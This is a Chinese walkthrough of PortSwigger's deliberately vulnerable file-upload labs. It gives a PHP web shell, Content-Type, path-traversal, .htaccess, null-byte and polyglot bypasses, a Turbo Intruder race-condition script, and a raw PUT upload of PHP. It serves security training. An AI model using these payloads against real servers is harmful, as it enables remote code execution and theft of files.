burp靶场--文件上传

burp靶场–文件上传

https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

1.文件上传

1、原理:文件上传漏洞是指Web服务器允许用户将文件上传到其文件系统,而不充分验证文件的名称、类型、内容或大小等内容。如果不能正确地执行这些限制,可能意味着即使是基本的图像上传功能也可以用来上传任意的和潜在危险的文件。这甚至可以包括支持远程代码执行的服务器端脚本文件
2、危害:在某些情况下,上传文件的行为本身就足以造成损害。其他攻击可能涉及对文件的后续HTTP请求,通常是为了触发服务器执行该文件

实验1:通过Webshell上传远程执行代码

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。在将用户上传的文件存储到服务器的文件系统之前,它不会对它们执行任何验证。
要完成该实验,请上传一个基本的 PHP Web shell 并使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
通过 Burp 代理流量时,登录您的帐户并注意上传头像图像的选项。
上传任意图像,然后返回您的帐户页面。请注意,您的头像的预览现在显示在页面上。
在 Burp 中,转到代理 > HTTP 历史记录。单击过滤器栏可打开“过滤器设置”对话框。在“按 MIME 类型过滤”下,启用“图像”复选框,然后应用更改。
在代理历史记录中,请注意您的图像是使用GET请求获取的/files/avatars/<YOUR-IMAGE>。将此请求发送到 Burp Repeater。
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取卡洛斯秘密文件内容的脚本。例如:
<?php echo file_get_contents('/home/carlos/secret'); ?>
使用头像上传功能上传恶意PHP文件。响应中的消息确认已成功上传。
在 Burp Repeater 中,更改请求的路径以指向您的 PHP 文件:
GET /files/avatars/exploit.php HTTP/1.1
发送请求。请注意,服务器已执行您的脚本并在响应中返回其输出(卡洛斯的秘密)。
提交解决实验室问题的秘密。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验2:通过绕过 Content-Type 限制上传 Webshell

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。它尝试阻止用户上传意外的文件类型,但依赖于检查用户可控的输入来验证这一点。
要完成该实验,请上传一个基本的 PHP Web shell 并使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
登录并上传图像作为您的头像,然后返回您的帐户页面。
在 Burp 中,转到代理 > HTTP 历史记录,您会注意到您的图像是GET使用/files/avatars/<YOUR-IMAGE>. 将此请求发送到 Burp Repeater。
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取 Carlos 秘密内容的脚本。例如:
<?php echo file_get_contents('/home/carlos/secret'); ?>
尝试上传此脚本作为您的头像。响应表明您只能上传 MIME 类型image/jpeg或image/png.
在 Burp 中,返回代理历史记录并找到POST /my-account/avatar用于提交文件上传的请求。将其发送到 Burp Repeater。
在 Burp Repeater 中,转到包含POST /my-account/avatar请求的选项卡。在消息正文中与您的文件相关的部分,将指定更改Content-Type为image/jpeg.
发送请求。请注意,响应表明您的文件已成功上传。
切换到包含请求的另一个中继器选项卡GET /files/avatars/<YOUR-IMAGE>。在路径中,将图像文件的名称替换为exploit.php并发送请求。请注意,响应中返回了 Carlos 的秘密。
提交解决实验室问题的秘密。

在这里插入图片描述
提交flag,完成实验。
在这里插入图片描述

实验3:Webshell通过路径遍历上传

【文件名使用路径遍历绕过了上传目录不执行限制】

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。服务器被配置为阻止执行用户提供的文件,但可以通过利用第二个漏洞来绕过此限制。
要完成该实验,请上传一个基本的 PHP Web shell 并使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
登录并上传图像作为您的头像,然后返回您的帐户页面。
在 Burp 中,转到代理 > HTTP 历史记录,您会注意到您的图像是GET使用/files/avatars/<YOUR-IMAGE>. 将此请求发送到 Burp Repeater。
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取 Carlos 秘密内容的脚本。例如:

<?php echo file_get_contents('/home/carlos/secret'); ?>
上传此脚本作为您的头像。请注意,该网站似乎并没有阻止您上传 PHP 文件。
在 Burp Repeater 中,转到包含GET /files/avatars/<YOUR-IMAGE>请求的选项卡。在路径中,将图像文件的名称替换为exploit.php并发送请求。请注意,服务器只是以纯文本形式返回 PHP 文件的内容,而不是执行脚本并返回输出。
在Burp的代理历史记录中,找到POST /my-account/avatar用于提交文件上传的请求并将其发送到Burp Repeater。
在 Burp Repeater 中,转到包含POST /my-account/avatar请求的选项卡,找到请求正文中与 PHP 文件相关的部分。在Content-Disposition标头中,更改filename以包含目录遍历序列:

Content-Disposition: form-data; name="avatar"; filename="../exploit.php"
发送请求。请注意,响应显示The file avatars/exploit.php has been uploaded.这表明服务器正在从文件名中删除目录遍历序列。
通过对正斜杠 ( ) 字符进行 URL 编码来混淆目录遍历序列/,结果是:

filename="..%2fexploit.php"
发送请求并观察消息现在显示The file avatars/../exploit.php has been uploaded.“这表明服务器正在对文件名进行 URL 解码”。
在浏览器中,返回您的帐户页面。
在 Burp 的代理历史记录中,找到该GET /files/avatars/..%2fexploit.php请求。请注意,响应中返回了 Carlos 的秘密。这表明该文件已上传到文件系统层次结构中的更高目录 ( /files),并随后由服务器执行。请注意,这意味着您还可以使用 请求此文件GET /files/exploit.php。
提交解决实验室问题的秘密。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

实验4:通过扩展程序黑名单绕过Webshell上传

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。某些文件扩展名被列入黑名单,但由于此黑名单配置中存在根本缺陷,因此可以绕过此防御。
要解决该实验,请上传一个基本的 PHP Web shell,然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
登录并上传图像作为您的头像,然后返回您的帐户页面。
在 Burp 中,转到代理 > HTTP 历史记录,您会注意到您的图像是GET使用/files/avatars/<YOUR-IMAGE>. 将此请求发送到 Burp Repeater。
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取卡洛斯秘密内容的脚本。例如:

<?php echo file_get_contents('/home/carlos/secret'); ?>
尝试上传此脚本作为您的头像。该响应表明您不允许上传带有.php扩展名的文件。
在 Burp 的代理历史记录中,找到POST /my-account/avatar用于提交文件上传的请求。在响应中,请注意标头显示您正在与 Apache 服务器通信。将此请求发送到 Burp Repeater。
在 Burp Repeater 中,转到请求选项卡POST /my-account/avatar并找到与 PHP 文件相关的正文部分。进行以下更改:
将参数值更改filename为.htaccess。
将标头的值更改Content-Type为text/plain。
将文件的内容(您的 PHP 负载)替换为以下 Apache 指令:

AddType application/x-httpd-php .l33t
这将任意扩展名 ( .l33t) 映射到可执行 MIME 类型application/x-httpd-php。当服务器使用该mod_php模块时,它已经知道如何处理这个问题。

发送请求并观察文件已成功上传。
使用 Burp Repeater 中的后退箭头返回到上传 PHP 漏洞的原始请求。
将参数值filename从更改exploit.php为exploit.l33t。再次发送请求,发现文件已成功上传。
切换到包含请求的另一个中继器选项卡GET /files/avatars/<YOUR-IMAGE>。在路径中,将图像文件的名称替换为exploit.l33t并发送请求。请注意,响应中返回了 Carlos 的秘密。由于我们的恶意.htaccess文件,该.l33t文件就像一个.php文件一样被执行。
提交解决实验室问题的秘密。

在这里插入图片描述
在这里插入图片描述
上传.htaccess文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验5:通过混淆的文件扩展名上传 Webshell

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。某些文件扩展名被列入黑名单,但可以使用经典的混淆技术绕过这种防御。
要解决该实验,请上传一个基本的 PHP Web shell,然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
登录并上传图像作为您的头像,然后返回您的帐户页面。
在 Burp 中,转到代理 > HTTP 历史记录,您会注意到您的图像是GET使用/files/avatars/<YOUR-IMAGE>. 将此请求发送到 Burp Repeater。
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取 Carlos 秘密内容的脚本。例如:

<?php echo file_get_contents('/home/carlos/secret'); ?>
尝试上传此脚本作为您的头像。响应表明您只能上传 JPG 和 PNG 文件。
在 Burp 的代理历史记录中,找到POST /my-account/avatar用于提交文件上传的请求。将其发送到 Burp Repeater。
在 Burp Repeater 中,转到请求选项卡POST /my-account/avatar并找到与 PHP 文件相关的正文部分。在Content-Disposition标头中,更改参数的值filename以包含 URL 编码的空字节,后跟.jpg扩展名:

filename="exploit.php%00.jpg"
发送请求并观察文件已成功上传。请注意,该消息将文件引用为exploit.php,表明空字节和.jpg 扩展名已被删除。
切换到包含请求的另一个中继器选项卡GET /files/avatars/<YOUR-IMAGE>。在路径中,将图像文件的名称替换为exploit.php并发送请求。请注意,响应中返回了 Carlos 的秘密。
提交解决实验室问题的秘密。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

实验6:通过多语言 Webshell 上传远程执行代码【图片马绕过】

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。尽管它会检查文件的内容以验证它是否是真实图像,但仍然可以上传并执行服务器端代码。
要解决该实验,请上传一个基本的 PHP Web shell,然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取卡洛斯秘密内容的脚本。例如:

<?php echo file_get_contents('/home/carlos/secret'); ?>
登录并尝试将脚本上传为您的头像。请注意,即使您尝试使用在之前的实验中学到的一些技术,服务器也会成功阻止您上传非图像文件。
创建一个多语言 PHP/JPG 文件,该文件本质上是一个普通图像,但在其元数据中包含您的 PHP 负载。执行此操作的一个简单方法是从命令行下载并运行 ExifTool,如下所示:

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php
这会将您的 PHP 有效负载添加到图像的Comment字段中,然后使用扩展名保存图像.php。

在浏览器中,上传多语言图像作为您的头像,然后返回您的帐户页面。
在 Burp 的代理历史记录中,找到该GET /files/avatars/polyglot.php请求。START使用消息编辑器的搜索功能在响应中的二进制图像数据中查找字符串。在此和END字符串之间,您应该看到卡洛斯的秘密,例如:

START 2B2tlPyJQfJDynyKME5D02Cw0ouydMpZ END
提交解决实验室问题的秘密。

在这里插入图片描述
上传:
在这里插入图片描述
在这里插入图片描述

实验7:通过竞争条件上传 Webshell

### 实验要求:
该实验室包含一个存在漏洞的图像上传功能。尽管它对上传的任何文件执行强大的验证,但可以通过在处理文件的方式中利用竞争条件来完全绕过此验证。
要解决该实验,请上传一个基本的 PHP Web shell,然后使用它来窃取文件的内容/home/carlos/secret。使用实验室横幅中提供的按钮提交此机密。
您可以使用以下凭据登录您自己的帐户:wiener:peter

### 实验操作:
登录并上传图像作为您的头像,然后返回您的帐户页面。
在 Burp 中,转到代理 > HTTP 历史记录,您会注意到您的图像是GET使用/files/avatars/<YOUR-IMAGE>.
在您的系统上,创建一个名为 的文件exploit.php,其中包含用于获取卡洛斯秘密内容的脚本。例如:

<?php echo file_get_contents('/home/carlos/secret'); ?>
登录并尝试将脚本上传为您的头像。请注意,即使您尝试使用在之前的实验中学到的一些技术,服务器似乎也成功阻止您上传非图像文件。
如果您尚未从 BApp 商店 将Turbo Intruder扩展添加到 Burp,请添加该扩展。
右键单击POST /my-account/avatar用于提交文件上传的请求,然后选择扩展 > Turbo Intruder > 发送到 Turbo Intruder。涡轮入侵者窗口打开。
将以下脚本模板复制并粘贴到 Turbo Intruder 的 Python 编辑器中:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)
在脚本中,替换为包含您的文件的<YOUR-POST-REQUEST>整个请求。您可以从 Turbo Intruder 窗口顶部复制并粘贴此内容。 POST /my-account/avatarexploit.php
替换为获取上传的 PHP 文件的请求<YOUR-GET-REQUEST>。GET最简单的方法是从代理历史记录中复制请求GET /files/avatars/<YOUR-IMAGE>,然后将路径中的文件名更改为exploit.php.
在 Turbo Intruder 窗口的底部,单击Attack。该脚本将提交一个POST上传exploit.php文件的请求,随后立即GET向/files/avatars/exploit.php.
在结果列表中,请注意,某些GET请求收到了包含 Carlos 秘密的 200 响应。这些请求在 PHP 文件上传之后、验证失败并被删除之前到达服务器。
提交解决实验室问题的秘密。
笔记
如果您选择手动构建GET请求,请确保使用\r\n\r\n序列正确终止它。另请记住,Python 将保留多行字符串中的所有空格,因此您需要相应地调整缩进以确保发送有效的请求。

在这里插入图片描述
将请求报文发送到intruder:
在这里插入图片描述

在这里插入图片描述
repeater模块手动上传重放包:同时观察intruder,发现690包就已经收到代码执行的结果了:在这里插入图片描述
而且可以看到在690-727这个请求包的时间段内是正常访问了恶意代码的:
在这里插入图片描述
在这里插入图片描述
竞态上传另一种方法:使用turbo Intruder插件:
先到burp商店安装:
在这里插入图片描述
在这里插入图片描述
在turbo intruder窗口中粘贴以下脚本:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

在这里插入图片描述
点击攻击后,查看状态码200的响应包。

其他情况的文件上传:

1、上传恶意客户端脚本
1、虽然可能无法在服务器上执行脚本,但仍然可以上载脚本以进行客户端攻击。如果可以上载HTML文件或SVG图像,则可以使用<script>标记创建存储的XSS有效负载。

————

2、如果上载的文件随后出现在其他用户访问的页面上,则他们的浏览器将在尝试呈现该页面时执行该脚本(由于同源策略限制,这些类型的攻击只有在上载文件来自与上载文件相同的源时才会起作用)
 

2、利用上载文件解析中的漏洞
1、如果上传的文件看起来存储和提供都很安全,那么最后的办法就是尝试利用解析或处理不同文件格式时特有的漏洞

————

2、如知道服务器解析基于XML的文件,如MicrosoftOffice文件或. xls文件,这可能是潜在的XXE注射液攻击。 

3、使用PUT上载文件
值得注意的是,一些web服务器可能被配置为支持PUT请求。如果没有适当的防御措施,这可能会提供上传恶意文件的替代方法,即使无法通过Web界面使用上传功能。

PUT /images/1.php HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-httpd-php
Content-Length: 49

<?php echo file_get_contents('/path/to/file'); ?>

参考:

### portswigger官方文件上传:
https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
### 【Burp系列】超全文件上传漏洞实验
https://mp.weixin.qq.com/s/yQ4UOsQMRwVr2Fb5lvYLQA
### PayloadsAllTheThings 文件上传:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
### owasp文件上传:
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/08-Test_Upload_of_Unexpected_File_Types
https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/10-Business_Logic_Testing/09-Test_Upload_of_Malicious_Files


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/335892.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

SpringMVC环境搭配

概述 Spring MVC是Spring Framework提供的Web组件&#xff0c;全称是Spring Web MVC,是目前主流的实现MVC设计模式的框架&#xff0c;提供前端路由映射、视图解析等功能 mvc是什么 MVC是一种软件架构思想&#xff0c;把软件按照模型&#xff0c;视图&#xff0c;控制器来划分…

linux基础学习(5):yum

yum是为了解决rpm包安装依赖性而产生的一种安装工具 1.yum源 1.1配置文件位置 yum源的配置文件在/etc/yum.repos.d/中 *Base源是网络yum源&#xff0c;也就是需要联网才能使用的yum源。默认情况下&#xff0c;系统会使用Base源 *Media源是光盘yum源&#xff0c;是本地yum源…

如何防止你的 Goroutine 泄露 Part2

文章目录 简述NumGoroutine演示案例pprofruntime/pprofhttp/net/pprof gopsLeak Test总结参考资料 上篇 文章说到&#xff0c;防止 goroutine 泄露可从两个角度出发&#xff0c;分别是代码层面的预防与运行层面的监控检测。今天&#xff0c;我们来谈第二点。 简述 前文已经介…

GPT应用开发:编写插件获取实时天气信息

欢迎阅读本系列文章&#xff01;我将带你一起探索如何利用OpenAI API开发GPT应用。无论你是编程新手还是资深开发者&#xff0c;都能在这里获得灵感和收获。 本文&#xff0c;我们将继续展示聊天API中插件的使用方法&#xff0c;让你能够轻松驾驭这个强大的工具。 插件运行效…

【计算机网络】2、传输介质、通信方向、通信方式、交换方式、IP地址表示、子网划分

文章目录 传输介质双绞线无屏蔽双绞线UTP屏蔽双绞线STP 网线光纤多模光纤MMF单模光纤SMF 无线信道无线电波红外光波 通信方向单工半双工全双工 通信方式异步传输同步传输串行传输并行传输 交换方式电路交换报文交换分组交换 IP地址表示IP地址的定义IP地址的分类无分类编址特殊I…

6.STEP格式模型的AP214和AP203格式有什么区别?

STEP&#xff1a;(Standard for the Exchange of Product Model Data&#xff0d;产品模型数据交互规范)&#xff0c;是一个比较全面的ISO标准 (ISO10303)&#xff0c;该标准描述了如何表示和交换数字产品信息。 其实就是3D文件的一个通用格式&#xff0c;每个3D设计软件都支持…

基于深度学习的车牌识别(YOLOv5和CNN)

基于深度学习的车牌识别(YOLOv5和CNN&#xff09; 目录 一、综述 二、车牌检测 一、综述 本篇文章是面向的是小白&#xff0c;想要学习深度学习上的应用&#xff0c;本文中目前应用了YOLO v5和CNN来对车牌进行处理&#xff0c;最终形成一个完整的车牌信息记录&#xff0c;…

强网杯2023 crypto

speed up 当时看到这个题目 也是觉得易懂 并且可以解出来的 但是数字实在是过大了兄弟 题目意思是计算2^27的阶乘,并获取得到每一位数的数字之和,flag即为该数字的sha256编码 2^27为134217728 gmpy2包是支持大数运算的,故利用其fac方法进行尝试,在等待一段时间后可以得到对…

第二次作业

1.基于域名[www.openlab.com](http://www.openlab.com)可以访问网站内容为 welcome to openlab!!! 创建文件 编辑文件 创建目录 添加内容 重启系统 更改host文件 在host追加域名 最后在网页查看及可 2.给该公司创建三个子界面分别显示学生信息&#xff0c;教学资料和缴费网…

flutter获取地理定位:geolocator依赖详细用法

本文使用geolocator插件实现app物理定位功能。 该插件的主要功能有&#xff1a; 获取最后已知位置&#xff1b;获取设备当前位置&#xff1b;获取连续的位置更新&#xff1b;检查设备是否启用了定位服务&#xff1b;计算两个地理坐标之间的距离&#xff08;米&#xff09;&am…

数据结构——排序

前言&#xff1a;哈喽小伙伴们好久不见&#xff0c;也是顺利的考完试迎来了寒假。众所周知&#xff0c;不怕同学是学霸&#xff0c;就怕学霸放寒假&#xff0c;假期身为弯道超车的最佳时间&#xff0c;我们定然是不能懒散的度过。 今天我们就一起来学习数据结构初阶的终章——…

眼镜用超声波清洗机好不好?洗眼镜比较好用的超声波清洗机推荐

眼镜是我们日常生活中必不可少的用品&#xff0c;它不仅能帮助我们矫正视力&#xff0c;更是我们与外界进行交流的重要工具。然而&#xff0c;随着眼镜的长时间佩戴&#xff0c;眼镜表面容易积累灰尘、污垢和细菌&#xff0c;这不仅影响了我们的视野&#xff0c;也可能对眼睛健…

Docker(一)简介和基本概念:什么是 Docker?用它会带来什么样的好处?

作者主页&#xff1a; 正函数的个人主页 文章收录专栏&#xff1a; Docker 欢迎大家点赞 &#x1f44d; 收藏 ⭐ 加关注哦&#xff01; 一、简介 本章将带领你进入 Docker 的世界。 什么是 Docker&#xff1f; 用它会带来什么样的好处&#xff1f; 好吧&#xff0c;让我们带…

Python连接数据库的梳理

我们通常用的数据库类型主要有关系型数据库&#xff0c;非关系型数据库等&#xff0c;其中关系型数据库主要有Microsoft SQL Server ,MySQL,Oracle&#xff0c;SQLite等&#xff0c;常用的非关系型数据库包括Redis、DynamoDB&#xff0c;MongoDB等 ​​​​​​​ 一 关系型…

hdu 3709 Balanced Number

Balanced Number 题意 定义一个非负整数在第 p p p 位为 p i v o t pivot pivot 的权重为&#xff1a;这个数位的值 \times 这个数位到 p i v o t pivot pivot 的距离 之和。如果在 p i v o t pivot pivot 左边的权重等于在 p i v o t pivot pivot 右边的权重&#xf…

uni-app小程序:文件下载打开文件方法苹果安卓都适用

api: const filetype e.substr(e.lastIndexOf(.)1)//获取文件地址的类型 console.log(文档,filetype) uni.downloadFile({url: e,//e是图片地址success(res) {console.log(res)if (res.statusCode 200) {console.log(下载成功,);var filePath encodeURI(res.tempFilePath);…

python开发之远程开发工具对比

前言 除了本地开发外&#xff0c;还有一种常见的开发方式就是远程开发&#xff0c;一般情况是一台Windows或mac笔记本作为日常使用的电脑&#xff0c;另有一台linux服务器作为开发服务器。开发服务器的性能往往较强&#xff0c;这样远程开发的方式一方面可以让我们在习惯的系统…

Python网络爬虫步骤是什么?新手小白必看 !

python网络爬虫步骤&#xff1a;首先准备所需库&#xff0c;编写爬虫调度程序&#xff1b;然后编写url管理器&#xff0c;并编写网页下载器&#xff1b;接着编写网页解析器&#xff1b;最后编写网页输出器即可。 本教程操作环境&#xff1a;windows7系统、python3.9版&#xff…

Spring | Spring中的Bean--下

Spring中的Bean: 4.Bean的生命周期5.Bean的配装配式 ( 添加Bean到IOC容器的方式 依赖注入的方式 )5.1 基于XML的配置5.2 基于Annotation (注解) 的装配 (更常用&#xff09;5.3 自动装配 4.Bean的生命周期 Spring容器可以管理 singleton作用域的Bean的生命周期&#xff0c;在此…

【Github搭建网站】零基础零成本搭建个人Web网站~

Github网站&#xff1a;https://github.com/ 这是我个人搭建的网站&#xff1a;https://xf2001.github.io/xf/ 大家可以搭建完后发评论区看看&#xff01;&#xff01;&#xff01; 搭建教程&#xff1a;https://www.bilibili.com/video/BV1xc41147Vb/?spm_id_from333.999.0.0…